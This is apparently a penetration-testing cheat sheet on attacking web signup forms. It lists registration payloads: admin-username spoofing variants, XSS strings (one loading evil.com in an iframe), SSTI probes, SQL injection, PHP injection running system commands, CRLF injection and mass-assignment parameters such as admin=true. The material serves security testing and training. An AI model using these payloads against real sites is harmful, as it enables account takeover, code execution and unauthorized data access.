# Web Registration (Signup)

Registration mechanism might be vulnerable to compromise.

### Register with the Same Username/Email Address as Existing User <a href="#register-with-the-same-usernameemail-address-as-existing-user" id="register-with-the-same-usernameemail-address-as-existing-user"></a>

We might be able to register the same username/email address as the existing user. It may affect the web server so be careful when testing.\
Here are examples of username to register.

```
admin
administrator
root
```

Alternatively, it’s worth to try various approach to register.

```
# Insert null byte
admin\0
admin%00

# Insert a space before username
 admin
%20admin

# Insert a space after username
admin 
admin%20

# Insert spaces around username
 admin 
%20admin%20

# Replace uppercase/lowercase
Admin
aDmIn

# Overflow (we need to find the longest characters that can be registered)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxadmin
```

### Register Malicious Username/Email Address <a href="#register-malicious-usernameemail-address" id="register-malicious-usernameemail-address"></a>

#### XSS <a href="#xss" id="xss"></a>

We might be able to inject XSS in username when registration.

```
john<script>alert(1)</script>
john</span><script>alert(1)</script>
john<iframe src=https://evil.com></iframe>

# Combine with overflow character length
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<script>alert(1)</script>
```

#### SSTI <a href="#ssti" id="ssti"></a>

It’s worth to try **SSTI** payloads if the website uses frameworks/template engines such as **Flask Pug, Angular, etc**. Register username with the following **SSTI**.

```
{{2*3}}
{2*3}
${2*3}
2*3

{{ `<script>alert(1)</script>` }}
{% debug %}
```

#### SQLi <a href="#sqli" id="sqli"></a>

If website queries the database items using username, we might be able to inject SQL command in the username. Register username with the following **SQLi**.

```
test' or 1=1--
test' or '1'='1'--

test' union select null,null--
test' union select null,null,null--
```

#### PHP Injection <a href="#php-injection" id="php-injection"></a>

```
john<?php echo system('id');?>
john<?php system('ping -c 1 10.0.0.1');?>
```

#### CRLF (%0d%0a) <a href="#crlf-0d0a" id="crlf-0d0a"></a>

Inserting CRLF code (`%0d%0a`) after the username or email, it may cause unexpected behavior.

```
username=john%0d%0a&password=mypassword123
email=attacker%40evil.com%0d%0a&password=mypassword123
```

### Broken Access Control <a href="#broken-access-control" id="broken-access-control"></a>

We might be able to break the access restrictions on target page by adding specific params when registration.

```
username=test&password=test&admin=true
username=test&password=test&isAdmin=true
username=test&password=test&admin=1
username=test&password=test&usertype=1
```